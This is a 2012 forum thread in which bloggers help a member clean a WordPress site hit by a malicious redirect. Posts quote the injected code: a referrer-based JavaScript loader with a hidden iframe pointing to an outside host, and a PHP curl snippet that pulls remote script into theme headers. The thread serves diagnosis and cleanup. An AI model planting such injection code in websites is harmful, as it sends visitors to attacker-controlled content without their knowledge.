| User | Post |
|
5:54 pm
February 21, 2012
|
This That And The MBA
| | |
| Member | posts 240 | 
|
|
|
Ok sometime over the past few days something happened to my site. Now there is a malware redirect.php somewhere on my site that sends you to adf.ly.
I have spent the last 2 days trying to learn code to no avail. I had the webhost remove something they thought last night but it turned out not to be the case. They said it is somewhere else and that i should contact my developer….Guess what that is me!
So i am at a loss, i dont know what to do? My site seems to load that occasionally and sometimes it doesnt. It doesnt load it when you go in through firefox but it does when through ie. I checked and there appears to be an adfly bot out there.
Any help suggestions would be greatly appreciated! Below is the script. Thanks
<script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.smuss.net/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.smuss.net/jquery.js"></scr'+'ipt>'); } </script>
<script type="text/javascript">
document.write('<iframe src="http://smuss.net/redirect.php" width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></iframe>');
|
|
|
|
|
6:23 pm
February 21, 2012
|
Jeremy @ Personal Finance Whiz
| | |
| Member | posts 174 |
|
|
|
Can you not just delete that snippet of code from your theme?
|
|
|
|
|
6:40 pm
February 21, 2012
|
This That And The MBA
| | |
| Member | posts 240 |
|
|
|
i cant find that line of script in the theme. Any suggestions on where to look. if you go to the main site and click view source you can see that on line around 50.
|
|
|
|
|
7:11 pm
February 21, 2012
|
Forest Parks
| | Cairo, Egypt | |
| Admin
| posts 1337 |
|
|
|
Can your host just restore from a backup 2 days ago? If not it may need a full clean up and could be in every theme file. A couple of people (I think Jesse Michelson is one) here offer services cleaning up these kinds of messes. I would offer but I don't have time today I am afraid, it's nearing the end of the day here.
|
|
|
|
|
7:16 pm
February 21, 2012
|
This That And The MBA
| | |
| Member | posts 240 |
|
|
|
If he is at PF Firewall I emailed him earlier. I havent heard back from him yet.
Thanks for your suggestion.
|
|
|
|
|
7:43 am
February 22, 2012
|
Jackie
| | |
| Member | posts 664 |
|
|
|
If you are using WordPress, I would look in Appearance > Editor and then click header.php. Based on what you've described, that seems like the most likely location for the snippet to me. Once you find it, you can remove it and click Update File at the bottom.
|
|
|
|
|
8:08 am
February 22, 2012
|
Charles @ MoneyGreenLife
| | |
| Member | posts 318 |
|
|
|
i wonder how these malwares are installing themselves onto our blogs. How do we prevent them from happening all over again even after a fix?
|
|
|
|
|
8:27 am
February 22, 2012
|
Jeremy @ Personal Finance Whiz
| | |
| Member | posts 174 |
|
|
|
If you don't see anything amiss in the header.php, check your functions.php.
|
|
|
|
|
9:03 am
February 22, 2012
|
This That And The MBA
| | |
| Member | posts 240 |
|
|
|
i just went and spent the 90 bucks for sucuri.net and they are removing it. if i spent the past 2 nights messing with it and i couldnt figure it out, my time is worth the 90 bucks also considering it comes iwht a year of protection. ughh it is a pain to deal with and not understanding code to much it could be buried anywhere.
|
|
|
|
|
9:40 am
February 22, 2012
|
FamilyMoneyValues
| | |
| Member | posts 812 |
|
|
|
This is a very good question. Is Wordpress more susceptible than other products to infestations?
Charles @ MoneyGreenLife said:
i wonder how these malwares are installing themselves onto our blogs. How do we prevent them from happening all over again even after a fix?
|
|
|
|
|
11:46 am
February 22, 2012
|
OneCentAtatime
| | Florida, USA | |
| Member
| posts 1778 |
|
|
|
Wordpress is vulnerable as any other software. But you increase the risk by installing various widgets and plugins. Always look for star rating and review of the plugin before blindly installing them for the sake of trying new things out.
MBA, try to remeber which plugin you installed lately and try removing plugins one by one, with last one first.
Your can FTP the content on your local desktop and search in files (any text editor does that) for the words "redirect' etc.
any plugin with that kind of word is a suspect. try to determine the plugin be seeing the file's folder structure or documentation within.
|
|
|
|
|
12:58 pm
February 22, 2012
|
jmichelsen
| | |
| Moderator
| posts 208 |
|
|
|
Hey Christopher, I haven't received your email but am happy to help. I just went to your site, saw your post about inmotion fixing the problem..then I got redirected to some weight-loss ad.
Is inmotion still working on the problem?
I've sent you an email.
|
|
|
1:04 pm
February 22, 2012
|
jmichelsen
| | |
| Moderator
| posts 208 |
|
|
|
OneCentAtatime said:
Wordpress is vulnerable as any other software. But you increase the risk by installing various widgets and plugins. Always look for star rating and review of the plugin before blindly installing them for the sake of trying new things out.
MBA, try to remeber which plugin you installed lately and try removing plugins one by one, with last one first.
Your can FTP the content on your local desktop and search in files (any text editor does that) for the words "redirect' etc.
any plugin with that kind of word is a suspect. try to determine the plugin be seeing the file's folder structure or documentation within.
WordPress in general isn't the issue like OneCent said, but it's the plugins/themes that usually cause havoc, more specifically, if plugins and themes aren't kept up to date, or are coded badly, you're open to attacks. When a new release of a plugin/theme/WordPress core comes out, in the release notes, vulnerabilities that were patched are revealed which makes the old version even more susceptible.
|
|
|
4:44 am
February 23, 2012
|
Smart Wealth
| | Michigan | |
| Member | posts 304 |
|
|
|
Too bad you had to pay to get the problem resolved.
|
|
|
|
|
9:54 am
February 23, 2012
|
This That And The MBA
| | |
| Member | posts 240 |
|
|
|
yah tell me about it….nothign more frustrating than trying to do something and it is beyond your comprehension….i know finance…computer language i was lost…it looked good to me but of course i didnt know what i was looking for…needless to say it is fixed after 3 long days…i should have just done it one day one…but i being me thought id try to fix it on my own…so i could pat myself on the back…
but im back up!!!!! wooo hooo
|
|
|
|
|
5:01 pm
February 23, 2012
|
OneCentAtatime
| | Florida, USA | |
| Member
| posts 1778 |
|
|
|
What actually is the root cause? Let us all know about it
|
|
|
|
|
6:16 am
February 24, 2012
|
This That And The MBA
| | |
| Member | posts 240 |
|
|
|
Sucuri.net removed spent about 10 hours working on it. They found that it was in the Thesis theme and the malware had somehow gotten installed in there. They reinstalled the theme but now it messed with the site, it removed some of the widgets and things I had. Better than having to start all over so that is what I will be doing this weekend. They also got rid of my Sociable Icons that i had installed to like or send to twitter. I wrote an little write up on my site yesterday about it.
|
|
|
|
|
1:36 pm
April 18, 2012
|
rstrode
| | Orlando, FL | |
| Member | posts 5 |
|
|
|
Post edited 1:40 pm – April 18, 2012 by rstrode
There is a really good chance that code was located in the /lib/html/ folder within your theme, not WordPress itself, but the theme you were using. It is probably located in the header.php file within that folder. There are several header.php's in these kind of themes, which make taking it down a little bit of work, but possible. It could have also been labeled something else. However, that is apart of a header loop, they added it as a function. I have seen it done to many sites. It is usually comes already included in the theme file or added later through an update. I have found this to be the case a few times helping friends out with their sites. I was a computer programmer before I decided to be a human programmer. So, they all ask me for help when they have issues.
I figured I would post this just in case anyone else has this issue they have a good place to start to track it down. Make sure to only delete the function. Below is an example from a friends site.
if (function_exists(‘curl_init’))
{
$url = “http://www.j-query.org/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>
The code you are looking for will look something like this, but may have a different link and it will fix you issue and you're site will run a lot faster.
|
|
|
|
Login
Search 
Home
Print this Topic 
Topic RSS 
